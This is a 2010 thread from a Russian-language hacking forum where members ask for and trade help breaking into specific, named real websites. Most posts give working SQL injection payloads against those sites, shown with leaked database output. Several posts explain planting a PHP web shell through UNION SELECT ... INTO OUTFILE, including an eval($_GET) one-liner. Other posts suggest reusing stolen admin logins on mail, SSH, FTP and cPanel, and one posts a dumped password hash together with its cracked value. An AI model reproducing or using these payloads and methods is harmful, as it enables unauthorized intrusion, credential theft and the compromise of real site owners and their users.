Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    хэлп помогтие раскрутить

    http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777'
    http://www.ncm.org.uk/news.asp?id=1'
    http://www.yakutproekt.ru/news.php?id=14517'
    http://www.lpem.org/index.php?mn=6&sb=9&id=9'&act=detail
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.ncm.org.uk/news.asp?id=1+and+1=(select+top+1+table_name+from+information_schema.tables)
    дальше сам
     
    _________________________
    1 person likes this.
  3. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    http://www.lpem.org/index.php?mn=6&sb=9&id=9%20or%201%20group%20by%20concat(version(),floor(rand(0)*2))having%20min(0)%20or%201--%201&act=detail
    Если не знаешь как дальше, то пиши в ПМ ;)
     
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.lpem.org/index.php?mn=6&sb=9&id=9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--&act=detail

    mm?
     
    _________________________
  5. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    мм... можно и так ;)
     
  6. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    чуваки в том то и дело что FROM никак не вставишь=((
    хотел станд. методом

    так уж быть

    http://www.lpem.org/index.php?mn=6&sb=9&id=9+and+%28select+1+from+%28select+count%280%29,concat%28%28select+version%28%29%29,floor%28rand%280%29*2%29%29+from+information_schema.tables+group+by+2%29a%29--&act=detail

    Duplicate entry '5.1.50-log1' for key 'group_key'
     
    #14986 pinch, 5 Oct 2010
    Last edited: 5 Oct 2010
  7. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    http://www.yakutproekt.ru/news.php?id=14517'

    вот это надо ....
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    тут точно не мускул, думаю ms_sql, но не скажу почему )
    21 столбцов но селект не робит.
    если есть желание копай дальше
     
    _________________________
  9. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    ну да, mssql

    http://www.yakutproekt.ru/news.php?id=14517+and+len(@@version)=len(@@version)

    4-ый сайт вообще не открывается без ошибки..
     
    #14989 R1dex, 5 Oct 2010
    Last edited: 5 Oct 2010
  10. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Выдрал лоигины и пассы админов на отдном сайте...
    Попал в админку) в админке написанно Extasy CMS for site.ru
    Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
    и доступен html
    мб как то можно залить шел с помощью sql запроса?
     
  11. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    для этого ты должен иметь права на запись и знать локальный путь до сайта.
    чтобы узнать есть ли права, используй запрос
    UNION SELECT File_Priv from mysql.user
    если в ответ получишь Y, то права есть.
    чтобы найти путь, попытайся вывести какую-нибудь ошибку, например через тот же sql запрос. или просмотри базу на наличие каких-нибудь конфигов. в них может быть указан путь.
    если права будут (в чём я сомневаюсь), и узнаешь путь, используй след. запрос для залития шелла:
    UNION SELECT 'шелл' from mysql.user into outfile 'путь_до_сайта/shell.php'
     
  12. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    кроме совета d1v попробуй эти логины пароли к mail/pma/ssh/ftp/cpanel/etc...
     
    _________________________
  13. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    БД
    Таблы с БД zaokolmi
    pwd name
    009091b3166dcbe1aa6202a97bcda08a zao
    пароль от хеша 123456 вроде
    Сайты на сервере(ReverseIP): больше 50
    кстати там можно и rdp поднять если прав хватит... завтра поковыряюсь.
     
    _________________________
    #14993 shell_c0de, 6 Oct 2010
    Last edited: 6 Oct 2010
  14. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    shell_code плиииз запросы в личку
     
  15. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1

    site?id=-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php' --

    Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php.

    и да Требуются привилегии FILE :)
     
  16. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    Почитай (Заливка шелла через MYSQL)
     
  17. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    а d1v что написал то ? =\
     
    _________________________
  18. nemans

    nemans Elder - Старейшина

    Joined:
    3 Dec 2006
    Messages:
    34
    Likes Received:
    3
    Reputations:
    0
    Подскажите программку сканирования и сохранения заданного диапазона интернет странц на сайте, например есть сайт http://site.com?112 и http://site.com?5000 можно ли отсканировать заданный диапазон с записью результатов, ссори если наивный вопрос.
     
  19. AdDa

    AdDa New Member

    Joined:
    19 Jan 2007
    Messages:
    2
    Likes Received:
    1
    Reputations:
    5
    Что в вашем понимании "отсканировать"? Вообще скрипт нужно сделать (мне по душе перл).
     
  20. high_rez

    high_rez New Member

    Joined:
    23 Aug 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Ужасно глупый вопрос.
    Если я пытаюсь найти XSS и вдруг мой браузер говорит мне, что обнаружена попытка проведения XSS атаки, это значит, что я все таки нашел что то и мой браузер это заблокировал и выдал сообщение?
    В моем браузере отключены скритпы.
     
    #15000 high_rez, 7 Oct 2010
    Last edited: 7 Oct 2010
Thread Status:
Not open for further replies.